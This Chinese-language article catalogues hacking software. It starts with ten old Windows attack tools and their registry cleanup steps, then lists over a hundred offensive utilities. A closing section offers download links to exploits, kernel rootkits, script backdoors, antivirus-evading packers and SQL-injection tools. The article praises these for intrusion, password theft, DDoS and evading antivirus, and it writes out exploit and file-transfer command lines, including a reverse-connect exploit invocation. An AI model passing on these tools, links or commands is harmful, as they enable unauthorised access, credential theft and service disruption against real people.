網上十大經典黑客軟體
一、古老的WinNuke
平台:Windows 95(包括OSR2版)
原理:利用Windows 95系統的漏洞,通過TCP/IP協定向遠程機器傳送一段信息,導致一個OOB錯誤,使之崩潰。
現象:電腦螢幕上出現一個藍底白字的提示:“系統出現異常錯誤”,按ESC鍵後又回到原來的狀態,或者當機。
危害:影響正常工作。
對策:用寫字板或其它的編輯軟體建立一個文本檔案,檔案名稱為OOBFIX.REG,內容如下:
REGEDIT4 [HKEY_LOCAL_MACHINE\System\CurrentControlSet \Services\VxD\MSTCP] ″BSDUrgent″=″0″
啟動資源管理器,雙擊該檔案即可。
二、網路精靈NetSpy
平台:Windows 95/Windows 98/Windows NT/Windows 2000
原理:NetSpy是一個基於TCP/IP的簡單檔案傳送軟體,實際上你可以將它看作一個沒有許可權控制的增強型FTP伺服器。通過它,黑客可以神不知鬼不覺地下傳和上載目標機器上的任意檔案,並可以執行一些特殊的操作。
現象:螢幕上奇怪地出現一個標題為“信使服務”的對話框,其內容是黑客在其監控端上指定的;正常執行的程式(遊戲、Internet瀏覽器、NetTerm、AutoCAD、WORD等等)“在無聲中”關閉;突然關機了;機器異常執行了一些程式;按Ctrl+Alt+Del鍵,在出現的系統列中會清楚地看到NetSpy這個進程。
危害:機器上的數據安全受到威協。系統中的系統進程和用戶進程,可被隨意的創建(Create)和終止(Kill)。螢幕受到黑客的監視。
對策:到註冊表中,刪除[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService或Run]中的NetSpy.EXE的鍵值。
三、超級黑客BO 2000
平台:Windows 95/Windows 98/Windows 2000
原理:BO 2000(Back orifice)是功能最全的TCP/IP構架的黑客工具。它除了具有NetSpy 2.0的全部功能外,還支持修改客戶端的電腦的註冊表。支持多媒體操作。數據採用加密形式的UDP包,原理與NetSpy v2.0大同小異(實際上NetSpy是BO 2000的一個漢化後的用Visual C++重新編譯的簡裝版)。
現象:一切都是在“無聲中”進行。硬碟總是奇怪地在響。
危害:機器完全在別人的控制之下,黑客成了超級用戶。連你的所有操作,都可由BO 2000自帶的“秘密攝像機”錄製成“錄像帶”。非MSDOS的一切視窗中的鍵盤的按鍵也會分門別類地記錄下來。
對策:到註冊表中,刪除[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService或Run]中的BOGUI.EXE和BOClient鍵值
四、垃圾王HDFILL
平台:Windows 95/Windows 98/Windows NT/Windows 2000
原理:電腦愛好者總喜歡執行SETUP.EXE或INSTALL.EXE看看是什麼軟體,HDFILL就是一個“特洛伊木馬”,表面上看像個安裝程式,實際上在“安裝”過程中產生999999999個變長的檔案,直到把你的硬碟“灌”滿為止。
現象:可愛的安裝畫面,等你發現時,硬碟中的垃圾太多了。
危害:999999999個檔案的清除工作量實在太大,不然只有動用Format來格式化硬碟。
對策:用HackerScan v0.69對來歷不明的軟體掃描。
五、鍵盤幽靈KeyboardGhost
平台:Windows 95/Windows 98/Windows NT/Windows 2000
原理:Windows系統是一個以訊息循環(Message Loop)為基礎的作業系統。系統的核心區保留了一定的位元組作為鍵盤輸入的緩衝區,其數據結構形式是佇列。鍵盤幽靈正是通過直接訪問這一佇列,使鍵盤上輸入的Password(顯示在螢幕上的是星號)得以記錄。
現象:在系統根目錄下生成一檔案名稱為KG.DAT的隱含檔案。
危害:你的電子信箱、代理的賬號、密碼會被記錄下來。總之,一切涉及以星號形式顯示出來的密碼視窗的所有符號都會被記錄下來。
對策:在註冊表中將[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService]→KG.EXE這一鍵值刪除,並將檔案KG.EXE從Windows\System目錄下刪除。還有C:\KG.DAT檔案也要刪除。
六、火眼金睛的ViewPwd
平台:Windows 3.x/Windows 95/Windows 98/Windows NT/Windows 2000
原理:通過訪問視窗中的私有數據獲取信息,使螢幕上加密的星號密碼現出“廬山真面目”。
現象:無。
危害:泄露個人信息,可能會蒙受經濟損失。
對策:及時清除Foxmail、JetCar之類的軟體中的星號。
七、天行刺客
平台:Windows 95/Windows 98
原理:通過從路由器中竊取未加密的信息,對指定的機器進行監控。水平極高。
現象:無
危害:你的E-mail中的UserID和Password會被黑客竊取,你的FTP、BBS登錄的用戶名和密碼同樣也會被竊取。
對策:儘量少用MS DOS下的FTP命令和Windows下的Telnet命令,使用Foxmail和JetCar、Dlexpert、NetAnt時小心你的Proxy Password被截取。儘量採用IE或Netscape這樣的瀏覽器上站,因為它們將你的重要數據進行了加密。
八、小偷ProxyThief
平台:Windows 95/Windows 98/Windows NT
原理:通過將你的計算機設定成代理伺服器,讓你繳納網費,用你的IP連入Internet幹壞事,結果你成了“替罪羊”。前提是,黑客必須直接在你的機器上執行ProxyThief,或通過NetSpy或BO 2000遠程執行它。ProxyThief的安裝是在後台進行的,你覺察不到。
現象:偶爾機器上網速度變慢。空機不執行任何程式,硬碟也會無故狂轉;用NetInspect v1.0(網路監視)對機器從0到9999連線埠進行掃描,會找出Free Proxy!連線埠,一般經驗不足的黑客不會修改其預設值8080。如果你的機器不是網關或代理,那你的連線埠已經被黑客盜用。
危害:蒙受經濟損失,隱藏了黑客。
對策:啟動REGEDIT.EXE,查找關鍵字“ProxyThief”,將所有與之相關的鍵和鍵值刪除。
九、寄生蟲ExeBind
平台:Windows 3.x/Windows 95/Windows 98/Windows NT/Windows 2000
原理:該小程式將指定的黑客程式捆綁到任何一個廣為傳播的熱門軟體上,使宿主程式執行時,寄生程式(黑客程式)也在後台被執行。而且支持多重捆綁。實際上是通過多次分割檔案,多次從父進程中調用子進程來實現的。
現象:幾乎無。
危害:NetSpy、HDFILL、BO 2000常通過這種形式在Internet上寄生傳播。
對策:用HackerScan v0.69進行掃描,查出被捆程式,並刪除。
十、連線埠獵手PortHunter
平台:Windows 95/Windows 98
原理:該軟體占用大量的Socks進行連線埠搜尋,降低區域網路傳輸的效率,危害網路安全。利用系統管理人員的疏忽,盜用SMTP連線埠發E-mail(:119)、盜用沒有密碼的代理連線埠(:8080)、盜用內部使用的FTP連線埠(:25)。
現象:區域網路變慢,瀏覽器上不了網,BBS掉線。
危害:自己機器的連線埠被黑客盜用,甚至在一些個人主頁上的“免費代理”欄目中出現。這會使一大幫“網蟲”一起來用你的連線埠上Internet、發匿名E-mail、在FTP上“灌水”、使用“信箱炸彈”、打網上傳呼。到那時,你不僅上不了網,連遊戲都玩不了。
對策:對於Novell網為框架的區域網路,我們可以限制指定程式的運行,如:ProxyHunter、Xhunter、SocksHunter、PortScanner、PortHunter。對於其它框架的區域網路的用戶,也可以在伺服器中設定禁止一些黑客程式的運行。但這只是騙騙小孩的把戲,因為只要將ProxyHunter.EXE更名為123abc.EXE就又可以照“黑”不誤了。
黑客兵器的四大基本派系
第一派系:遠程控制系
它脫胎於四千多年前特洛伊城中的那個大木馬,就是現在特別活躍的那些木馬後門程式。包括兩個部分:1.被控端,又稱服務端,將其植入要控制的PC內,用於記錄用戶的相關信息(特別是密碼、賬號之類的特別信息),相當於給人安了個後門;2.控制端,又稱客戶端(千萬別和前者搞混了!),是黑客用於操縱的一端,用來發布黑客的控制命令,例如螢幕截圖、記錄用戶的鍵盤操作、傳傳檔案甚至是格式化你的硬碟。
遠程控制系的功夫都十分厲害,一旦你中招就沒了秘密,你的一切對幕後的那些(可能有很多個)黑客來說都是完全透明的,他能任意操縱你PC上的檔案、重啟、關機……一句話,此時你的PC就是他的。比較有名的有灰鴿子、冰河、廣外女生、BO及木馬BEAST等等,它們是黑兵器中種類最齊全、數目最多、破壞性最大的一派。
第二派系:漏洞掃描系
此派系主要是對付作業系統,不用說,Windows自然鹹了眾矢之的。這些年來,微軟不斷地縫補Windows,就是因為有太多的漏洞被人掃描出來,像Unicode漏洞、CGI漏洞、WebDAV溢出漏洞、idq-ida溢出漏洞等。其中最常見的就是連線埠掃描,它能根據作業系統開放了各個連線埠的反饋信息來進行探測,從而為下一步攻擊找出最佳點。像X-Scan、流光、代理獵手、溯雪、Super-Scan、追捕之流就是該派系中的佼佼者,可以說該派系是黑客作案的踩點器。
第三派系:信息炸彈系
最初只是用來轟炸信箱,就是把大量的垃圾郵件不斷塞入同一信箱內,直至最終撐爆它。後來又發展到QQ炸彈(把你從QQ踢下來)、藍屏攻擊(使你的PC出現藍屏而不得不重啟)等,還有的是惡攻伺服器,使伺服器不堪重負並導致線路擁塞直至崩潰。此為黑客報復、泄憤的慣用招式(如幾年前的中美黑客大戰就屬這種類型),屬於一種“面對面”的攻擊。此派系的代表是kaboom!、QQ千夫指、ICQ Revenge、WinNuke V95等。
第四派系:暴力破解系
此派系又稱Cracker一族,是專門對付各種商業軟體或共享軟體的。因為除免費軟體外,幾乎所有軟體都要求用戶輸入註冊信息(如用戶名、機器碼或者註冊碼),當然這些都得用錢來買,否則就要受功能或者日期的限制。黑客們只須套上個字典檔案,把其中的用戶名和密碼逐一取出試用,直到遇上那個正確的為止。只要他們把字典檔案設定得當,破解這類軟體只是個時間問題,此法法是窮舉破解,又稱為暴力破解。還有的是直接記錄調進記憶體的註冊碼明文或者密文信息,經過提取、對比、分析(這裡面要用到一些比較複雜的彙編語言方面知識),最後算出可用的註冊碼。不管用哪種方式,黑客最後都會給成功破解的軟體加上一個所謂的註冊機或者“打狗棒”程式,以達到與合法用戶相同的許可權。像網路刺客2、Language2000及winhex等均屬此類。此外,還有一種專門探查星號式密碼的工具,一般用來破解共享的密碼或者屏保密碼、QQ密碼等。因為密碼多用星號掩蓋,而它們就能把這些星號還原成明文顯示,如星星密語、SnadBoy's Revelation和PQwak等。
101款精典黑客小工具
webadv 針對iis+sp3的溢出成功率很高(溢出後system許可權!) *
ipscan 大範圍網段快速ipc$猜解
svc 遠程安裝/刪除win2k服務
3389.vbs 遠程安裝win2k終端服務不需i386
arpsniffer arp環境sniffer(需要winpcap2.1以上) *
ascii 查詢字元和數字ascii碼(常用來對URL編碼用以躲避ids或腳本過濾)
ca 遠程克隆賬號
cca 檢查是否有克隆賬號
cgi-backdoor 幾個cgi木馬(十多種利用最新漏洞的web腳本後門,涵蓋jsp,php,asp,cgi等等) *
crackvnc 遠程/本地破解WinVNC密碼(本地破用-W參數)
pass.dic 密碼字典
debploit win2k+sp2配置最佳許可權提升工具
fpipe 連線埠重定向工具
fscan superscan命令行版本(可定義掃描時的源連線埠並支持udp連線埠掃描) *
hgod04 DDOS攻擊器
idahack ida溢出
idq.dll 利用isapi漏洞提升許可權(對sp0+sp1+sp2都非常有效,也是很棒的web後門)
IIS idq溢出
inst.zip 指定程式安裝為win2k服務 *
ip_mail.rar 傳送主機動態IP的軟體 *
ipc.vbs 不依賴ipc$給遠程主機開telnet
ispc.exe idq.dll連線客戶端
Keyghost.zip 正版鍵盤記錄器
log.vbs 日誌清除器(遠程清除不依賴ipc$)
md5.pl 論壇md5加密密碼破解器
msadc.pl winnt的msadc漏洞溢出器 *
MsSqlHack mssql溢出程式1
mysql-client mysql客戶端
Name.dic 最常用的中國人用戶名(看看你常用的用戶名在不在裡面)
PassSniffer 大小僅3kb的非交換機sniffer軟體 *
p***ec 通過ipc管道直接登錄主機
pskill 殺進程高手:)
pslist 列進程高手:)
rar 命令行下的中文版winrar(功能相當全面) *
reboot.vbs 遠程重啟主機的腳本
sdemo.zip 巨好的螢幕拍攝的錄像軟體
shed 遠程查找win9x的共享資源
sid 用sid列用戶名
SkServerGUI snake多重代理軟體
SkSockServer snake代理程式
SMBCrack 超快的ipc破解軟體(適合破一台機)
socks 利用這工具安裝木馬,即使網關重新低格硬碟木馬也在嘿嘿 *
SocksCap 把SOCKS5代理轉化為萬能代理
SPC.zip 可以直接顯示出遠程win98共享資源密碼的東東 *
WMIhack 基於WMI服務進行賬號密碼的東東(不需要ipc)
skmontor snake的註冊表監視器(特酷的)
sql1.exe mssql溢出程式2
sql2.exe mssql溢出程式3
SqlExec mssql客戶端
SuperScan GUI界面的優秀掃描器
syn SYN攻擊第一高手
upx120 特好的壓縮軟體,常用來壓縮木馬躲避防毒軟體
wget 命令行下的http下載軟體
Win2kPass2 win2k的密碼大盜
Winnuke 攻擊rpc服務的軟體(win2ksp0/1/2/3+winnt+winxp系統不穩定)
smbnuke 攻擊netbios的軟體(win2ksp0/1/2/3+winnt+winxp系統當機)
WinPcap_2_3 nmap,arpsniffer等等都要用這個
WinPcap_2_3_nogui.exe 無安裝界面自動安裝的WinPcap_2_3(命令行版) *
scanbaby2.0 能對80%的mail服務利用漏洞列賬號密碼破解(超酷喔,去看rfc里有mail弱點說明) *
SuperDic_V31 非常全面的黑客字典生成器
Getadmin win2k+sp3配置的許可權提升程式(不錯!!!) *
whoami 了理自己的許可權
FsSniffer 巨好的非交換機sniffer工具
twwwscan 命令行下巨好的cgi掃描器
TFTPD32 給遠方開tftp服務的主機傳檔案(當然要有個shell)
RangeScan 自定義cgi漏洞的GUI掃描器
pwdump2 本地抓winnt/2k密碼散列值(不可缺)
pwdump3 遠程抓winnt/2k密碼散列值(不可缺)
procexpnt 查看系統進程與連線埠關聯(GUI界面) *
nc 已經不是簡單的telnet客戶端了
CMD.txt 有什麼cmd命令不懂就查查它 *
fport 命令行下查看系統進程與連線埠關聯(沒有GUI界面的procexpnt強)
BrutusA2 全功能的密碼破解軟體,支持telnet,ftp,http等服務的口令破解
cmd.reg 檔案名稱自動補全的reg檔案(命令行:按TAB鍵自動把sys補全為system,再按一次就變為system32)
regshell 命令行下的註冊表編輯器
nscopy 備份員工具(當你是Backup Operators組的用戶時有時你的許可權會比admin還大)
session.rar 有了win/nt2000目標主機的密碼散列值,就可以直接傳送散列值給主機而登錄主機 *
klogger.exe 一個幾kb的擊鍵記錄工具,運行後會在當前目錄生成KLOGGER.TXT檔案 *
SMB2 發動smb的中間人MITM攻擊的工具,在session中插入自己的執行命令 *
xptsc.rar winxp的遠程終端客戶端(支持win2000/xp)
SQLhack.zip 相當快的mssql密碼暴力破解器
mssql 相當快的mssql密碼暴力破解器
ntcrack.zip 利用獲取到的MD4 passwd hash破解帳號密碼
SQLSniffer.rar MSsql的密碼明文嗅探器
TelnetHack.rar 在擁有管理員許可權的條件下,遠程打開WIN2000機器的Telnet服務
RFPortXP.exe XP下關聯連線埠與進程的程式
SQLTools.rar mssql工具包
ServiceApp.exe 遠程安裝/刪除服務
hgod 具有SYN/DRDoS/UDP/ICMP/IGMP拒絕服務測試功能的選項
hscan 小型綜合掃描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh,smtp等等相當全面)
HDoor.rar ping後門(icmp後門)
SIDUserEnum.exe 利用sid得到用戶列表(小榕的那個sid有時不能完全列舉出來) *
RPC_LE.exe 利用rpc溢出使win2k重啟(對sp3+sp4hotfix有效) *
r3389.exe 查詢TERMINAL SERVER更改後的連線埠(1秒內) *
smbsniffer.exe 獲取訪問本地主機網頁的主機散列值(支持截獲區域網路主機散列) *
NetEnum.exe 通過3389連線埠+空連線獲取對方主機大量信息 *
aspcode.exe 經測試最有效的asp溢出程式第二版(對sp2有效)
SSLProxy 針對使用ssl加密協定的代理(掃描器通過它就可以掃描ssl主機了!!!!) *
lsa2 在lsa註冊表鍵里獲取winnt/2k的明文密碼包括sqlserver的(打了補丁就沒用了) *
psu.exe 用指定進程的許可權打開指定的程式
ldap.msi ldap 輕量級目錄服務客戶端,通過389連線埠獲取主機大量信息如賬號列表 *
rootkit 從系統底層完美隱藏指定進程,服務,註冊表鍵並可以連線埠綁定的核心級win2k後門
黑客常用小工具的使用說明
Nc
Nc(Netcat的簡寫)被稱為”瑞士軍刀”,是黑客工具箱必備的工具之一,可見其功能之強大。Nc的功能與windows系統中的telnet.程式類似,但是Nc更為強大,功能更多,它能夠建立並接受傳輸控制協定(TCP)和用戶數據報協定(UDP)連線,可以在這些連線上讀寫數據,直到連線關閉為止,通俗的講就是可以用它來連線我們指定的機器的連線埠。下面介紹幾種Nc常用的命令格式:
(1)nc 192.168.0.1 1234 連線Ip地址為192.168.0.1計算機的1234連線埠;
(2)nc –l –s 1234 監聽本機的1234連線埠;
(3)nc –vv 192.168.0.1 1234 刺探Ip地址為192.168.0.1計算機的1234連線埠是否開放。
Tftp
Tftp(Trivial File Transfer Protocol)是一種基於UDP連線的檔案傳輸,一般是使用Windows系統自帶的tftp.exe和一個Tftp伺服器端軟體構成一個完整的傳輸結構,它具有Ftp的檔案傳輸能力,但是不具有任何安全性。它是這樣使用的:運行本地的TFTP Server(比如tftpd32.exe)軟體並保證始終開啟直至傳輸全部完成,在另一方執行Tftp命令。執行命令格式:
tftp -i 127.0.0.1 put test.exe,該命令是將test.exe上傳到127.0.0.1計算機上;
tftp -i 127.0.0.1 get test.exe,該命令是從127.0.0.1下載test.exe。
通常黑客在獲得目標計算機的一定許可權後會使用Tftp把一些檔案傳到目標計算機上,如圖1所示。
黑客軟體圖1 Tftp伺服器端程式界面
WSockExpert
WSockExpert是一個抓包工具,它可以用來監視和截獲指定進程網路數據的傳輸,並可以用來修改網路傳送和接收數據,程式界面如圖2所示。
黑客軟體圖2 WsockExpert程式界面
Achilles
Achilles是一個設計用來測試web應用程式安全性的工具。它是一個代理伺服器,運行後會占用本地計算機的5000連線埠,在一個HTTP會話中扮演著“中間人”(man-in-the-middle)的角色。一個典型的HTTP代理伺服器將在客戶瀏覽器和web伺服器間轉發數據包,但Achilles卻載取發向任一方的HTTP會話數據,並且在轉發數據前可以讓用戶修改這些數據,這也就為我們理解HTTP會話原理提供了幫助,黑客利用這個工具可以修改數據包,進行類似cookie欺騙的活動。我們瀏覽某些Web站點時,這些站點會在你的硬碟上用很小的文本檔案存儲了一些信息,這些檔案就稱為Cookie。Cookie主要的用途就是為了方便網友下次訪問網站時不需要輸入自己的用戶名和密碼。只要對用戶的Cookie進行改寫就可以達到Cookie欺騙的目的。
Achilles的使用方法:在Internet Explorer中將代理伺服器的IP位址設定為127.0.0.1,連線埠為5000,如圖3所示,然後到Achilles中,把Intercept Modes中的第1,2,5選項選中,再單擊程式中的Start Proxy圖示(三角形) ,就可以獲取本地計算機的HTTP數據包了。如圖4所示。
黑客軟體圖3
在Internet Explorer中將代理伺服器的IP位址設定為127.0.0.1,連線埠為5000
黑客軟體圖4 Achilles的運行界面
黑客兵器譜排名
縱橫於黑客江湖,沒幾件稱心兵器怎能立足?
No.1 懂得用刀殺人並不困難,要懂得如何用刀救人,卻是件困難的事。
兵器名稱:X-Scan
殺傷指數:★★★★☆
獨門絕技:採用了多執行緒方式對指定IP位址段進行安全漏洞檢測,支持外掛程式功能,提供了圖形界面和命令行兩種操作方式。掃描內容包括:遠程服務類型、作業系統類型及版本,各種弱口令漏洞、後門、套用服務漏洞、網路設備漏洞、拒絕服務漏洞等二十幾個大類,支持線上升級,是國內最優秀的安全掃描軟體之一。通常為黑客攻擊前尋找肉雞,檢測漏洞之用。
No.2 一個人一生中一定要勉強自己做幾件不願做的事,這樣的生命才有意義。
兵器名稱:流光
殺傷指數:★★★★☆
獨門絕技:可以探測POP3、FTP、HTTP、PROXY、FORM、SQL、SMTP、IPC$上的各種漏洞,並針對各種漏洞設計了不同的破解方案,能夠在有漏洞的系統上輕易得到被探測的用戶密碼,進而掌控guest和管理員許可權。不論是新手還是資深黑客都對它青睞有加。每天有大量受害者欲哭無淚。
No.3 世上若還有比遇見一個潑婦更頭痛的事,那就是遇見了一群潑婦。
兵器名稱:DDoS系列
殺傷指數:★★★★★
獨門絕技:分散式拒絕服務攻擊,比較難以防範的攻擊手段。攻擊者藉助一定數量的傀儡機,提出過量合理的服務請求來占用攻擊對象系統和網路資源,造成目標癱瘓和崩潰。
黑客的神兵利器數不勝數,好把式的黑客還可以隨手打造專用工具。心有多大,舞台就有多大。難道這些就算是黑客最厲害的武器嗎?當然不是,黑客最厲害的武器,是他們的微笑。
常用黑客軟體用途分類
一、防範:
這是從安全的角度出發涉及的一類軟體,例如防火牆、查病毒軟體、系統進程監視器、連線埠管理程式等都屬於此類軟體。這類軟體可以在最大程度上保證電腦使用者的安全和個人隱私,不被黑客破壞。網路伺服器對於此類軟體的需要也是十分重視的,如日誌分析軟體、系統入侵軟體等可以幫助管理員維護伺服器並對入侵系統的黑客進行追蹤。
二、信息蒐集:
信息蒐集軟體種類比較多,包括連線埠掃描、漏洞掃描、弱口令掃描等掃描類軟體;還有監聽、截獲信息包等間諜類軟體,其大多數屬於亦正亦邪的軟體,也就是說無論正派黑客、邪派黑客、系統管理員還是一般的電腦使用者,都可以使用者類軟體完成各自不同的目的。在大多數情況下,黑客使用者類軟體的頻率更高,因為他們需要依靠此類軟體對伺服器進行全方位的掃描,獲得儘可能多的關於伺服器的信息,在對伺服器有了充分的了解之後,才能進行黑客動作。
三、木馬與蠕蟲:
這是兩種類型的軟體,不過他們的工作原理大致相同,都具有病毒的隱藏性和破壞性,另外此類軟體還可以由擁有控制權的人進行操作,或由事先精心設計的程式完成一定的工作。當然這類軟體也可以被系統管理員利用,當作遠程管理伺服器的工具。
四、洪水:
所謂“洪水”即信息垃圾炸彈,通過大量的垃圾請求可以導致目標伺服器負載超負荷而崩潰,近年來網路上又開始流行DOS分散式攻擊,簡單地說也可以將其歸入此類軟體中。洪水軟體還可以用作郵件炸彈或者聊天式炸彈,這些都是經過簡化並由網路安全愛好者程式化的“傻瓜式”軟體,也就是本書一開始指責的“偽黑客”手中經常使用的軟體。
五、密碼破解:
網路安全得以保證的最實用方法是依靠各種加密算法的密碼系統,黑客也許可以很容易獲得一份暗文密碼檔案,但是如果沒有加密算法,它仍然無法獲得真正的密碼,因此使用密碼破解類軟體勢在必行,利用電腦的高速計算能力,此類軟體可以用密碼字典或者窮舉等方式還原經過加密的暗文。
六、欺騙:
如果希望獲得上面提到的明文密碼,黑客需要對暗文進行加密算法還原,但如果是一個複雜的密碼,破解起來就不是那么簡單了。但如果讓知道密碼的人直接告訴黑客密碼的原型,是不是更加方便?欺騙類軟體就是為了完成這個目的而設計的。
七、偽裝:
網路上進行的各種操作都會被ISP、伺服器記錄下來,如果沒有經過很好的偽裝就進行黑客動作,很容易就會被反跟蹤技術追查到黑客的所在,所以偽裝自己的IP位址、身份是黑客非常重要的一節必修課,但是偽裝技術需要高深的網路知識,一開始沒有堅實的基礎就要用到這一類軟體了。
經典黑客軟體大奉送
攻擊程式
1,darewere遠程溢出程式。
http://www.hacker.com.cn/down/DameWare.rar
特徵連線埠6129,darewere遠程控制控制程式溢出工具,命令格式是:
DameWare.exe
反向連線,需要有外網ip,溢出後在本地用nc監聽連線埠,普通防火牆能饒過。
2,Messenger遠程溢出程式。
http://www.hacker.com.cn/down/MsgHack.rar
Messenger服務溢出程式,對伺服器沒有太大的作用,對普通客戶機成功率比較高,考慮到危害的問題,此版本只能針對xp+sp1,不能攻擊2000,命令格式是:
MsgHack -h 192.168.0.1 -v 3 -l 1 -s 1 -r 192.168.0.5 -p 99
同樣是反向連線,成功率為60%以上。
3,Retina RPC DCOM scan +RPC 圖形界面溢出程式。
http://www.hacker.com.cn/down/rpc.rar
retina的掃描加攻擊程式,現在對外網幾乎不能成功,對入侵伺服器或者是網關後的滲透有非常好的效果!個人發現區域網路有90%可以成功!
後門木馬
1,核心級rootkit:hxdef100
http://www.hacker.com.cn/down/hxdef100.zip
參數有點多,單純使用並沒有太大的優點,只能實現連線埠復用和簡單的shell,但是別忽略了他的功能!如果配合功能強大的後門,那將是非常厲害的!!(注意:hxdef100.exe是主程式,千萬不能自己運行,不然清除就麻煩了!請詳細看說明,不建議新手使用!)
2,wineggdropshell
http://www.hacker.com.cn/down/wineggdropshell.rar
功能非常強大的後門程式!配置簡單方便,可自定義連線埠,實現常見的安全檢測,相當於一個工具箱。(強烈建議配合hxdef使用!)
3,TFTPD
http://www.hacker.com.cn/down/tftpd.rar
由lilo提供的TFTP程式,可自己修改一些配置,在入侵後shell下傳輸數據比較方便。
4,腳本後門
http://www.hacker.com.cn/down/腳本後門.rar
包含cmd.cgi、cmd.pl、lpmm.asp、phpshell.php,短小精幹的腳本後門程式,用於SQL注入並上傳程式後控制伺服器和提升許可權。由臭要飯的!提供。
5,iget
http://www.hacker.com.cn/down/iget.rar
小騙子的iget腳本,上傳到伺服器然後運行,可下載預定義網頁路徑的程式,然後用某種方法運行,功能單一,非常適合入侵。
6,SQL綜合利用工具
http://www.hacker.com.cn/down/SQLTools.rar
由“藍色凱博”CEO發哥編寫的SQL利用程式,能實現非常強大的功能,可利用資料庫的存儲過程實現非常多的功能,是SQL入侵中不可多得的好東東。
7,remoxec
http://www.hacker.com.cn/down/remoxec.zip
沒有3389,沒有ipc$,沒有連線方式,只知道對方的帳戶和密碼,如何連線,如何進一步入侵?使用這個工具就可以實現連線並運行的目的。(需要rpc支持!)
8,幻影
http://www.hacker.com.cn/down/幻影.rar
用於木馬或者後門的加殼,對國內防毒軟體和安全程式能比較好的躲開,但是很多次實驗後發現國外的伺服器上的那些安全程式能殺。
腳本相關
1,access注入程式
http://www.hacker.com.cn/down/Creak.rar
用於發現SQL注入漏洞後的自動破解,程式不是很穩定,多試幾次。
2,md5解碼器http://www.hacker.com.cn/down/md5解碼器.rar
md5的暴力破解程式,使用簡單方便,時間+運氣=成功破解。
3,access注入程式2
http://www.hacker.com.cn/down/nbsi.rar
全自動的access注入程式,功能不錯,內有註冊碼。
掃描程式
1,Fluxay5
http://www.hacker.com.cn/down/Fluxay5.rar
這個不用多說了,流光5。
2,xscan3
http://www.hacker.com.cn/down/xscan3.rar
也不廢話了,可升級的xscan3.0。
